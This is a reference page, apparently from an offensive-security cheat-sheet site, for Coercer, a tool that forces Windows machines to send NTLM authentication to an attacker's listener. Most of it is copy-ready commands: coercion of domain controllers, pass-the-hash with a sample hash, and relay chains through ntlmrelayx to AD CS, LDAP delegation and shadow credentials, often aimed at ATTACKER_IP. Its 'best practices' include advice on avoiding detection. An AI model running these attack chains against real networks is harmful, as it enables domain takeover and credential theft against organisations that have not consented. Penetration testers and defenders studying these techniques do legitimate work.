Coercer
Coercer is a Python tool that automates Windows authentication coercion attacks by triggering NTLM authentication from target machines to an attacker-controlled listener. It supports multiple coercion methods including PetitPotam, PrinterBug, DFSCoerce, and ShadowCoerce, enabling NTLM relay attacks for AD privilege escalation.
Installation
Section titled “Installation”Via pip
Section titled “Via pip”pip install coercerFrom GitHub
Section titled “From GitHub”git clone https://github.com/p0dalirius/Coercer.git
cd Coercer
pip install -r requirements.txt
python3 -m coercer --helpRequirements
Section titled “Requirements”- Python 3.8+
- impacket
- pycryptodomex
- requests
- argparse
Quick Start
Section titled “Quick Start”Basic coercion with credentials:
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINScan target to identify working methods:
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAINCoerce with NTLM hash:
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d DOMAINCoercion Methods
Section titled “Coercion Methods”Coercer supports numerous coercion methods across different MS-RPC protocols and Windows services:
| Method | Service | Protocol | MS-RPC Interface | Impact |
|---|---|---|---|---|
| PetitPotam | EfsRpc | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| PrinterBug | Spooler | \\pipe\spoolss | Printer (RPC) | High - SYSTEM auth |
| DFSCoerce | MSDFS | \\pipe\netdfs | NetDFS | Medium - SYSTEM auth |
| ShadowCoerce | Shadow Copy VSS | \\pipe\vssadmin | FSRVP | Medium - SYSTEM auth |
| MSEFSRCoerce | EFSRPC | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| Webexec | WebClient | HTTP | IOCTL | Medium - User context |
| DFSCoerceRPC | MSDFS | \\pipe\netdfs | NetDFS | Medium - SYSTEM auth |
| RprRemoteFindFirstFile | RemoteRegistry | \\pipe\winreg | RemoteRegistry | Low - Registry read |
| EfsRpcOpenFileRaw | EfsRpc | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| Lsasrv | LSA | \\pipe\lsarpc | LSA | Medium - LSASS auth |
| Tssession | Terminal Services | \\pipe\tssession | TermSrv | Low - TS context |
Scan Mode
Section titled “Scan Mode”Enumerate which coercion methods work without triggering full authentication:
# Scan all methods
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# Scan with NTLM hash
coercer scan -t 192.168.1.50 -u domain\\user -H HASH -d DOMAIN
# Filter by method name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-method PetitPotam
# Filter by protocol
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-protocol EfsRpc
# Filter by pipe name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-pipe-name efsrpc
# Scan with timeout per method
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 10Coerce Mode
Section titled “Coerce Mode”Trigger actual NTLM authentication to listener:
# Basic coercion to listener
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# Coerce specific method
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --method PetitPotam
# Coerce with output verbosity
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -v
# Coerce to alternative port
coercer coerce -l 192.168.1.100:4444 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# Coerce with timeout
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 30Fuzz Mode
Section titled “Fuzz Mode”Discover new coercion methods by fuzzing RPC endpoints:
# Fuzz target to discover methods
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100
# Fuzz with specific pipe
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --pipe efsrpc
# Fuzz with timeout
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --timeout 30Authentication Options
Section titled “Authentication Options”Username/Password Authentication
Section titled “Username/Password Authentication”coercer coerce -l LISTENER -t TARGET -u domain\\username -p password -d DOMAIN
coercer coerce -l LISTENER -t TARGET -u username -p password -d DOMAINNTLM Hash Authentication (Pass-the-Hash)
Section titled “NTLM Hash Authentication (Pass-the-Hash)”coercer coerce -l LISTENER -t TARGET -u domain\\username -H LM:NTLM -d DOMAIN
coercer coerce -l LISTENER -t TARGET -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586cKerberos Authentication
Section titled “Kerberos Authentication”coercer coerce -l LISTENER -t TARGET -k -d DOMAIN
export KRB5CCNAME=/tmp/user.ccache
coercer coerce -l LISTENER -t TARGET -kNo Authentication
Section titled “No Authentication”coercer coerce -l LISTENER -t TARGET --no-pass
coercer scan -t TARGET --no-passLocal Authentication
Section titled “Local Authentication”coercer coerce -l LISTENER -t TARGET --localListener Setup
Section titled “Listener Setup”Using ntlmrelayx (SMB Relay)
Section titled “Using ntlmrelayx (SMB Relay)”# Terminal 1: Start ntlmrelayx
ntlmrelayx.py -t 192.168.1.60 --no-http-server -smb2support
# Terminal 2: Run coercer
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINUsing Responder (LLMNR/NBT-NS)
Section titled “Using Responder (LLMNR/NBT-NS)”# Terminal 1: Start Responder
responder -I eth0 -v
# Terminal 2: Run coercer with SMB relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINCustom SMB Server Listener
Section titled “Custom SMB Server Listener”# Using impacket smbserver
smbserver.py -smb2support -ip 192.168.1.100 share /tmp
# Run coercer to relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINListening on Specific Port
Section titled “Listening on Specific Port”coercer coerce -l 192.168.1.100:445 -t TARGET -u domain\\user -p password -d DOMAINCommon Attack Chains
Section titled “Common Attack Chains”Coerce to ntlmrelayx → AD CS ESC8
Section titled “Coerce to ntlmrelayx → AD CS ESC8”# Terminal 1: Start ntlmrelayx targeting ADCS
ntlmrelayx.py -t http://dc.domain.local/certsrv/certfnsh.asp -template DomainController --no-http-server -smb2support
# Terminal 2: Coerce to relay
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAINCoerce to ntlmrelayx → LDAP for RBCD
Section titled “Coerce to ntlmrelayx → LDAP for RBCD”# Terminal 1: Start ntlmrelayx for LDAP relay with RBCD
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --delegate-access
# Terminal 2: Coerce target
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAINCoerce to Relay for Shadow Credentials
Section titled “Coerce to Relay for Shadow Credentials”# Terminal 1: Start ntlmrelayx targeting LDAP
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --shadow-credentials
# Terminal 2: Trigger coercion
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAINCoerce Machine Account to Relay for Privilege Escalation
Section titled “Coerce Machine Account to Relay for Privilege Escalation”# Scan first to find working method
coercer scan -t DC_IP -u domain\\user -p password -d DOMAIN
# Coerce DC to listener for relay to ADCS
coercer coerce -l ATTACKER_IP -t DC_IP -u domain\\user -p password -d DOMAIN --method PetitPotamWebDAV Coercion
Section titled “WebDAV Coercion”Force HTTP authentication instead of SMB for cross-protocol relay attacks:
# Enable WebDAV coercion (requires WebClient service running)
coercer coerce -l http://ATTACKER_IP:80 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# WebDAV with custom path
coercer coerce -l http://ATTACKER_IP:8080/share -t TARGET -u domain\\user -p password -d DOMAIN
# Combine with HTTP listener on ntlmrelayx
ntlmrelayx.py -I http://ATTACKER_IP:8080 -t http://target.com --no-smb-server
coercer coerce -l http://ATTACKER_IP:8080 -t TARGET -u domain\\user -p password -d DOMAINFiltering Options
Section titled “Filtering Options”Filter by Method Name
Section titled “Filter by Method Name”# Only PetitPotam
coercer scan -t TARGET -u domain\\user -p password --filter-method PetitPotam
# Multiple methods
coercer scan -t TARGET -u domain\\user -p password --filter-method "PetitPotam|PrinterBug"Filter by Protocol Name
Section titled “Filter by Protocol Name”# Only EfsRpc protocol
coercer scan -t TARGET -u domain\\user -p password --filter-protocol EfsRpc
# Multiple protocols
coercer scan -t TARGET -u domain\\user -p password --filter-protocol "EfsRpc|NetDFS"Filter by Pipe Name
Section titled “Filter by Pipe Name”# Only efsrpc pipe
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name efsrpc
# Multiple pipes
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name "efsrpc|netdfs"Combine Filters
Section titled “Combine Filters”coercer scan -t TARGET -u domain\\user -p password -d DOMAIN \
--filter-method PetitPotam \
--filter-protocol EfsRpcTroubleshooting
Section titled “Troubleshooting”Target Unreachable
Section titled “Target Unreachable”# Verify connectivity
ping TARGET_IP
# Test SMB connectivity
smbclient -L //TARGET_IP -u domain\\user -p password
# Test with timeout
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN --timeout 30Authentication Failed
Section titled “Authentication Failed”# Verify credentials
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v
# Try alternative username format
coercer scan -t TARGET -u DOMAIN\\user -p password -d DOMAIN
# Use NTLM hash instead
coercer scan -t TARGET -u domain\\user -H HASH -d DOMAINService Not Available
Section titled “Service Not Available”# Some methods require specific services running
# Check if MSDFS, Spooler, or EfsRpc services are active
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v
# Try with timeout increase
coercer coerce -l LISTENER -t TARGET -u domain\\user -p password -d DOMAIN --timeout 60No Working Methods Found
Section titled “No Working Methods Found”# Method may be patched or disabled
# Try scanning with verbose output
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v
# Enumerate installed hotfixes
wmic qfe list brief /format:listListener Connection Issues
Section titled “Listener Connection Issues”# Verify listener is running and accessible
telnet LISTENER_IP 445
# Check firewall rules
sudo ufw allow 445/tcp
# Use verbose logging
coercer coerce -l LISTENER_IP -t TARGET -u domain\\user -p password -d DOMAIN -vBest Practices
Section titled “Best Practices”- Always Scan First: Use
coercescan to identify working methods before triggering full coercion - Use Specific Methods: Target known-working methods to avoid noise and detection
- Filter Results: Leverage filtering to reduce network activity and operational footprint
- Combine with Relay: Pair Coercer with ntlmrelayx or Responder for effective privilege escalation
- Monitor Logs: Coercion attempts generate security event logs; operate during high activity periods
- Patch Management: Target systems with outdated patches are more likely to support multiple methods
- Service Enumeration: Verify target services (Spooler, EfsRpc, MSDFS) are running before coercion
- Credential Handling: Use NTLM hashes or Kerberos tickets to avoid passing plaintext credentials
- Clean Relay Chains: Ensure ntlmrelayx or relay tool is properly configured before coercing
- Documentation: Log all coercion attempts, timing, and results for post-exploitation analysis
Related Tools
Section titled “Related Tools”| Tool | Purpose |
|---|---|
| PetitPotam | Standalone EfsRpc coercion tool; foundation for Coercer |
| ntlmrelayx | NTLM relay framework to authenticate against other services |
| Responder | LLMNR/NBT-NS poisoning and relay tool |
| Certipy | Active Directory Certificate Services enumeration and exploitation |
| krbrelayx | Kerberos relay attacks and alternative authentication methods |
| SpoolSample | Standalone PrinterBug implementation |
| PrintNightmare | RCE exploit for CVE-2021-1675 via Print Spooler |
| Shadow Credentials | Credential dumping via shadow credentials in Active Directory |